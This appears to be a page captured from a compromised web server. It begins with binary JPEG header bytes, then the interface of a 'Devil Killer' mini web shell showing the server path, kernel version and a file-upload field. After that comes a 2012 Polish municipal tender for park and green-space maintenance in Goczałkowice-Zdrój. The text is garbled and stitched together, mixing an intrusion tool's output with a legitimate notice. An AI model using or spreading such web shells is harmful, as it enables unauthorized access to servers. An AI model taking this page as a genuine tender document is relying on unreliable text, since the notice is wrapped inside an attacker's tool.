JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/469480-N-2012.html

<p class="kh_header"><b>Goczałkowice-Zdrój: Bieżące utrzymanie Parku Zdrojowego i terenów zielonych w Gminie Goczałkowice-Zdrój w 2013 roku</b><br>
<b>Numer ogłoszenia: 469480 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Goczałkowice-Zdrój , ul. Szkolna 13, 43-230 Goczałkowice-Zdrój, woj. śląskie, tel. 032 2107185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goczalkowicezdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie Parku Zdrojowego i terenów zielonych w Gminie Goczałkowice-Zdrój w 2013 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usług objętych zamówieniem obejmuje:

Zadanie I - Park Zdrojowy:
Teren Parku Zdrojowego określa załącznik nr 1 do niniejszej specyfikacji.

Powierzchnia Parku Zdrojowego:
-	park mały:
dz. nr 	1237/36 - 	0,3900 ha = 	3 900,00 m2
dz. nr 	1238/36 - 	0,2600 ha = 	2 600,00 m2
dz. nr 	1239/36 - 	0,1628 ha = 	1 628,00 m2
dz. nr 	1240/36 - 	0,2684 ha = 	2 684,00 m2
dz. nr 	1241/36 - 	0,2100 ha = 	2 100,00 m2
dz. nr 	1242/36 - 	0,0550 ha =       550,00 m2
dz. nr 	1245/36 - 	0,0516 ha = 	   516,00 m2
dz. nr 	1247/36 - 	0,0600 ha = 	   600,00 m2
dz. nr 	380/107 - 	0,2268 ha = 	2 268,00 m2
dz. nr 	35 - 		0,1680 ha = 	1 680,00 m2
Razem:	            1,8526 ha =  18 526,00 m2

-	park duży:
dz. nr 	417/106 - 	0,0207 ha =   207,00 m2
dz. nr 	114/36 - 	0,2600 ha =   2 600,00 m2
Razem: 	            0,2807 ha =       2 807,00 m2


Zakres usługi:
-	koszenie trawników wraz z zagrabieniem i wywozem skoszonej trawy z terenu Parku. W zakres koszenia wchodzą także:
-  skarpy stawu Maciek od strony północnej (od strony potoku Kanar) - 2 090,00 m2,
- skarpy po obu stronach potoku Kanar na długości od stacji PKP Zdrój do ul. Uzdrowiskowej - 1 160,00 m2
-	bieżące odtworzenie (renowacja) wydeptywanych trawników,
-	cięcia pielęgnacyjno - sanitarne drzew (odcięcie gałęzi i konarów, odcięcie odrostów korzeniowych, wywóz odpadów niezwłocznie po zakończeniu prac, wygrabienie i uporządkowanie terenu wokół),
-	cięcia pielęgnacyjno - sanitarne krzewów (usunięcie starych, suchych lub połamanych pędów, wygrabienie i uporządkowanie terenu wokół, wywóz odpadów niezwłocznie po zakończeniu prac),
-	bieżące przeglądy drzewostanu i wykonywanie prac związanych z likwidacją zagrożenia dla ludzi bądź mienia,
-	formowanie i odchwaszczanie żywopłotów i krzewów,
-	formowanie drzew,
-	bieżące usuwanie wiatrołomów na terenie Parku Zdrojowego oraz na wszystkich skarpach stawu Maciek,
-	sukcesywne jesienne wygrabienie liści, do 30 listopada każdego roku, wraz z ich wywozem,
-	utrzymanie w czystości (zamiatanie) alejek parkowych oraz alejek przy stawie Maciek poprzez uprzątnięcie wszelkiego rodzaju zanieczyszczeń - ok. 5 907,79 m2,
-	odchwaszczanie nawierzchni alejek parkowych oraz alejek przy stawie Maciek poprzez uprzątnięcie wszelkiego rodzaju zanieczyszczeń - ok. 5 907,79 m2,
-	utrzymanie w czystości skwerów poprzez uprzątnięcie wszelkiego rodzaju zanieczyszczeń,
-bieżące opróżnianie z odpadów koszy na śmieci i wywóz odpadów na wysypisko - ilość: park duży - 20 szt. koszy o pojemności jednego kosza wynoszącej 24 l (0,024 m3), staw Maciek - 8 szt. koszy o pojemności jednego kosza wynoszącej 18 l (0,018 m3),
razem - 28 szt. koszy,
-	wymiana zniszczonych koszy na śmieci,
-	konserwacja (malowanie oraz wymiana zniszczonych elementów) podestów do opalania usytuowanych przy stawie Maciek - ilość 10 szt., o wym. 240 cm x 310 cm,
-	utrzymanie zimowe alejek parkowych i mostków oraz alejek przy stawie Maciek poprzez odśnieżanie i likwidację śliskości zimowej środkami dozwolonymi do stosowania w parkach - ok. 5 907,79 m2. Odśnieżanie drogi dojazdowej do stacji PKP Zdrój na odcinku od ul. Uzdrowiskowej do stacji PKP Zdrój wykona firma zajmująca się zimowym utrzymanie dróg gminnych.
-	pozimowe oczyszczanie alejek parkowych (spacerowych) i mostków z materiałów użytych do zwalczania śliskości zimowej. 

Zadanie II - Drogi, parkingi, ronda:
Wykaszanie poboczy dróg, rowów, skrzyżowań, wysepek oraz parkingów wraz z zagrabieniem i wywozem skoszonej trawy. Wykaz dróg stanowi załącznik nr 2 do niniejszej specyfikacji.
-	pobocza dróg - 								     32 049,00 m2
-	parking przy ul. Głównej (przy kościele) - 				                      933,35 m2
-	parking przy ul. Szkolnej 70 - 						          115,50 m2
- wysepka rozdzielająca pasy ruchu (skrzyż. DK 1 z ul. Uzdrowiskową) - 	          747,00 m2
-	teren przy DK 1 (przy ul. Uzdrowiskowej, przejście wodociągu) - 		       1 326,00 m2
-	droga rowerowa (betonowa) od torów kolejowych przy stacji PKP Zdrój 
do mostku na ul. Powstańców Śl., pobocze drogi obustronnie (0,5 m) -             840,00 m2
-	droga dojazdowa do starej części budynku Urzędu Gminy od 
skrzyżowania z ulicą Szkolną, pobocze drogi obustronnie - 		          280,00 m2
-rowy przy drogach gminnych: ul. Borowinowa, Bór I, ul. Graniczna,
      ul. Grzebłowiec, ul. Powstańców Śląskich, ul. Wypoczynkowa, ul. Źródlana - 3 000,00 m2

      Razem: 39 290,85 m2 .

Wykonawca wykona minimum sześć pokosów w/w terenów w okresie jednego roku:
-	termin I koszenia - 		ok. 5 maja,
-	termin II koszenia - 		ok. 5 czerwca,
-	termin III koszenia - 		ok. 5 lipca,
-	termin IV koszenia -  	        ok. 5 sierpnia,
-	termin V koszenia - 		ok. 5 września,
-	termin VI koszenia - 		ok. 5 października.

Utrzymanie rond - cięcia pielęgnacyjne-sanitarne krzewów wraz z zagrabieniem i wywozem:
-	utrzymanie ronda pod Bocianem - 					   55,30 m2
-	utrzymanie ronda przy drodze zbiorczej (skrzyż. drogi zbiorczej z DK1) - 573,00 m2
      Razem: 628,30 m2.
Wykonawca wykona dwie usługi w okresie 1 roku polegające na pracach pielęgnacyjno-sanitarnych związanych z utrzymaniem w/w rond:
-	termin I usługi - 		ok. 20 kwietnia,
-	termin II usługi - 		ok. 20 września.

Zadanie III - Przepompownie ścieków:
Wykaszanie terenów przepompowni ścieków wraz z zagrabieniem i wywozem skoszonej trawy:

1. Przepompownia Główna przy ul. Uzdrowiskowej: 
-	pobocze drogi dojazdowej (od ul. Uzdrowiskowej do bramy przepompowni) obustronnie (1 m) - 124,00 m2, 
-	teren przepompowni - 2 422,32 m2, 
      Razem - 2 546,32 m2.	

2. Przepompownia PKP przy ul. PCK: 
-	pobocze drogi dojazdowej od strony ul. PCK obustronnie (0,5m) - 133,20 m2,
-	droga dojazdowa gruntowa od strony ul. PCK do pierwszych płyt betonowych - 192,00 m2, 
-	dojście do przepompowni od strony ścieżki rowerowej betonowej (od strony stawu Maciek) - 46,25 m2, 
-	teren przepompowni - 23,44 m2, 
-	teren wokół ogrodzenia przepompowni (0,5m) - 12,50 m2,
      Razem - 407,39 m2.

3. Przepompownia Dębowa przy ul. Dębowej:
-	pobocze drogi dojazdowej (od ul. Dębowej do bramy przepompowni) obustronnie (1 m) - 64,00 m2,
-	teren przepompowni - 189,97 m2,
-	teren wokół ogrodzenia przepompowni (1m) - 72,00 m2,
      Razem - 325,97 m2.

4. Przepompownia Obwodnica przy ul. Borowinowej:
-	pobocze drogi dojazdowej (od ul. Borowinowej do bramy przepompowni) obustronnie (1 m) - 208,00 m2,
-	teren przepompowni - 195,90 m2,
-	teren wokół ogrodzenia przepompowni (0,5 m) - 30,50 m2,
      Razem - 434,40 m2.

5. Przepompownia Wieś 1 przy ul. Głównej ( rejon PKP):
-	teren przepompowni - 66,91 m2,
-	teren wokół ogrodzenia przepompowni (1 m), strona wschodnia, południowa, północna - 28,00 m2,
      Razem - 94,91 m2.

6. Przepompownia Wieś 2 przy ul. Głównej (rejon parkingu przy kościele):
-	teren przepompowni - 75,75 m2,
-	teren wokół ogrodzenia przepompowni (3 m) strona wschodnia, południowa, zachodnia, północna - 97,80 m2,
-      Razem - 173,55 m2.
7. Przepompownia Bór przy ul. Powstańców Śl.:
-	pobocze drogi dojazdowej (od ul. Powstańców Śl., do bramy przepompowni) obustronnie        (3 m) - 42,00 m2,
-teren przepompowni - 207,49 m2,
-	teren wokół ogrodzenia przepompowni, strona zachodnia, północna, wschodnia (1 m) - 58,70 m2,
      Razem - 308,19 m2.

8. Przepompownia Zapora przy ul. Jeziornej:
-	teren przepompowni - 17,73 m2.
      Razem - 17,73 m2.

9. Przepompownia Linde przy ul. Grzebłowiec:
-	teren przepompowni - 21,40 m2.
      Razem - 21,40 m2.

Powierzchnia łączna w/w terenów wynosi - 4 329,86 m2.

Wykonawca wykona minimum sześć pokosów w/w terenów w okresie jednego roku:
-	termin I koszenia - 		ok. 10 maja,
-	termin II koszenia - 		ok. 10 czerwca,
-	termin III koszenia - 		ok. 10 lipca,
-	termin IV koszenia -  	ok. 10 sierpnia,
-	termin V koszenia - 		ok. 10 września,
-	termin VI koszenia - 		ok. 10 października.

Zadanie IV - Działki gminne:
Wykaszanie działek gminnych wraz z zagrabieniem i wywozem skoszonej trawy:
-	działka przy budynku komunalnym ul. Szkolna 70 - za budynkiem (strona północna) do drzew, lewa strona (strona zachodnia) do płotu, prawa strona (strona wschodnia) do ogrodzenia cmentarza, przód budynku (strona południowa) teren zielony do ul. Szkolnej:
      dz. nr 4204/190 -  3 353,00 m2,  
dz. nr 4203/191 -       42,50 m2, 
razem: 3 395,50 m2,  
-	działka przy budynku komunalnym ul. Powstańców Śl. 43 - z przodu budynku (strona zachodnia) do drogi, z tyłu budynku (strona wschodnia) do granicy działki - dz. nr 2434/39 razem: 609,50 m2,   
-	działka przy stacji transformatorowej ul. Solankowa - 25,00 m2,
-	działki przy torach kolejowych na ul. PCK: 
dz. nr 1826/36 - 0,1001ha = 1 001,00 m2 
dz. nr 1827/36 - 0,0752ha =   752,00 m2 
razem: 1 753,00 m2,
-	działka przy budynku Ośrodka Zdrowia skrzyżowanie ul. Wiślnej 
1403/36 - 0,0466ha = 466,00 m2 
razem:   466,00 m2, 
-	działki przy ul. Powstańców Śląskich:       
      dz. nr 1171/38   -   2 700,00 m2  (ogrodzona)   
dz. nr 2951/39 -     2 081,00 m2, 
razem: 4 781,00 m2,  
-	działki przy ul. Uzdrowiskowej i Borowinowej (teren GOK):       
      dz. nr 2382/28  -  6 128,00 m2     
dz. nr 2384/28 -   1 596,00 m2, 
razem: 7 724,00 m2,  

Powierzchnia łączna w/w terenów wynosi - 18 754,00 m2.

Wykonawca wykona minimum sześć pokosów w/w terenów w okresie jednego roku:
- termin I koszenia - 		ok. 15 maja,
-termin II koszenia - 		ok. 15 czerwca,
-termin III koszenia - 		ok. 15 lipca,
-termin IV koszenia -  	ok. 15 sierpnia,
-termin V koszenia - 		ok. 15 września,
-termin VI koszenia - 		ok. 15 października,

Zadanie V - wykonanie obsady kwiatami i roślinami bylinowymi rond, skwerów i wysepek wraz z pielęgnacją i ich utrzymaniem
Zadanie polega na przygotowaniu terenu zielonego pod sadzenie kwiatów i roślin bylinowych tj. przekopaniu gleby rodzimej, przygotowaniu warstwy ziemi tj. przywiezieniu i rozplantowaniu ziemi urodzajnej, żyznej lub kompostowej o grubości 5 cm oraz posadzeniu i podlaniu roślin. Planowane jest nasadzenie kolorowych kompozycji przy wykorzystaniu roślin rabatowych jednorocznych w ilości nie mniejszej niż 20 szt/m2 następujących gatunków: szałwia, starzec popielny, begonia i aksamitka. Wykonawca, którego oferta zostanie wyłoniona uzgodni dobór kolorów z Zamawiającym.
Tereny do obsadzenia kwiatami:
-teren zielony pomiędzy chodnikiem a ul. Borowinową (od bloku wielorodzinnego do wjazdu na teren Uzdrowiska) na działce nr 29 o pow. 110,0 m2, w ilości nie mniej niż 2176 sztuk kwiatów, 
-wysepka przy rondzie Pod bocianem (od ul. Uzdrowiskowej, Borowinowej i Szkolnej) na działkach nr 1743/11 i 542/16 o pow. 60,0 m2, w ilości nie mniej niż 1200 sztuk kwiatów, 
-teren przy chodniku prowadzącym do kościoła pw. Św. Jerzego (jako przedłużenie już istniejącej zieleni) na działce nr 4204/191 o pow. 60,0 m2, w ilości nie mniej niż 1200 sztuk kwiatów, 
-rondo u zbiegu ulic Szkolnej i Jeziornej o pow. 28,0 m2 na działce nr 506/92 i 1177/104 w ilości nie mniejszej niż 560 szt. 

Powierzchnia łączna terenów do obsadzenia kwiatami wynosi około 258,0 m2 w ilości 5160 sadzonek kwiatów.
Nasadzenia kwiatów będą zlecane wg cen zaoferowanych w załączniku nr 3 (formularz cen jednostkowych). Kalkulując cenę należy przyjąć cenę zakupu sadzonki, przygotowania terenu, posadzenia, pielęgnacji i utrzymania oraz usunięcia po zakończeniu procesu wegetacji tj. przed zimą. Rozliczenie nastąpi na podstawie faktycznie posadzonych kwiatów po odbiorze robót (protokolarnie). 

Zadanie VI - wycinka drzew i krzewów 
Zamawiający zamierza wyciąć w 2013 roku (zgodnie z decyzjami):
-10 sztuk olszy (51- 100 cm x 1 szt., 101-200 cm x 8 szt., 201 - 300 cm x 1 szt.),
- 54 sztuk topoli (101 - 200 cm x 52 szt, 201- 300 cm x 2 szt.), 
- 13 sztuk świerków (do 50 cm x 13 szt.), 
-  4 szt. wierzby (100 - 200 cm x 4 szt), 
-  2 szt. lipy (o obwodach 250 i 260 cm),
-  4 dęby (51-100  cm x 1 szt. 101 - 200 cm x 3 szt.),
-  1 brzozę (o obwodzie 140 cm).
Wykonanie wycinki drzew polegać będzie na ścięciu drzew na poziomie minimum 5,0 cm poniżej nawierzchni gruntu, zasypaniu ziemią dołów po wycince, uporządkowaniu i wyrównaniu terenu, uprzątnięciu terenu po prowadzonych pracach. Wykonawca pozyskane drewno zagospodaruje we własnym zakresie.
Wykonawca opracuje i uzgodni na własny koszt projekt tymczasowej organizacji ruchu i zabezpieczenie terenu robót. W trakcie prowadzonych robót Wykonawca odpowiada za oznakowanie i utrzymanie oznakowania oraz zabezpieczenie robót zgodnie z projektem czasowej organizacji ruchu. Wykonawca jest zobowiązany wykonać zakres prac zgodnie z instrukcją dotyczącą wykonania robót w pasie drogowym, obowiązującymi normami i przepisami bezpieczeństwa i higieny pracy. 
Wycinka w/w drzew zlecana będzie wg cen zaoferowanych w załączniku nr 3 (formularz cen jednostkowych). Kalkulując cenę należy przyjąć cenę usunięcia poszczególnych drzew wraz z uwzględnioną wartością pozyskanego surowca (drewna). Uzyskane drewno pozostanie w dyspozycji Wykonawcy. 

Zadanie VII - Zamówienia uzupełniające:
1.  Zamawiający przewiduje zamówienia uzupełniające wyszczególnione w Zadaniu V i VI..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych. Zamówienia uzupełniające stanowić mogą nie więcej niż 50% wartości zamówienia podstawowego i polegać będą na powtórzeniu zamówienia tego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.00.00-6, 77.34.00.00-5, 90.60.00.00-3, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 4 000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi się wykazać że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, świadczył co najmniej 1 usługę polegającą na bieżącym utrzymaniu Parku i terenów zielonych, a wartości tego zamówienia wynosiła co najmniej 100 000 - zł netto;Potwierdzone referencjami, że usługa została wykonana prawidłowo. 
Spełnienie ww warunków będzie dokonane na podstawie treści wymaganych dokumentów na zasadzie spełnia lub nie spełnia warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować  minimum następującym sprzętem niezbędnym do realizacji zamówienia: 
- samochód patrolowy						szt. 1
- samochód samowyładowczy					szt. 1
- ciągnik z przyczepą 					        szt. 1
- ciągnik z pługiem lemieszowym		                    szt. 1
- samochód specjalny z platf. i balkonem (zwyżka)  		szt. 1
- koparko-ładowarka 							szt. 1
- nożyce spalinowe do cięcia żywopłotów (krzewów) 		szt. 2
- piła spalinowa do wycinki drzew					szt. 2
- kosiarka spalinowa							szt. 1
- kosiarka do ciągnika (bijakowa lub płozowa)			szt. 1
- kosa spalinowa (podkaszarka)					szt. 4
- dmuchawa spalinowa do liści					szt. 1
Spełnienie ww warunków będzie dokonane na podstawie treści załączonych dokumentów ( wykazu ) na zasadzie spełnia lub nie spełnia warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować następującym potencjałem kadrowym - min. 1 operator(kierowca) sprzętu specjalistycznego służącego do odśnieżania bądź usuwania śliskości zimowej, wraz z uprawnieniami do kierowania pojazdem + min. 4 pracowników fizycznych.
Wykonawca winien wskazać kierownika nadzorującego wykonanie całości usługi.
Spełnienie ww warunków będzie dokonane na podstawie treści złączonych dokumentów ( wykazu ) na zasadzie spełnia lub nie spełnia warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje ubezpieczeniem ( opłaconą polisę ) od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
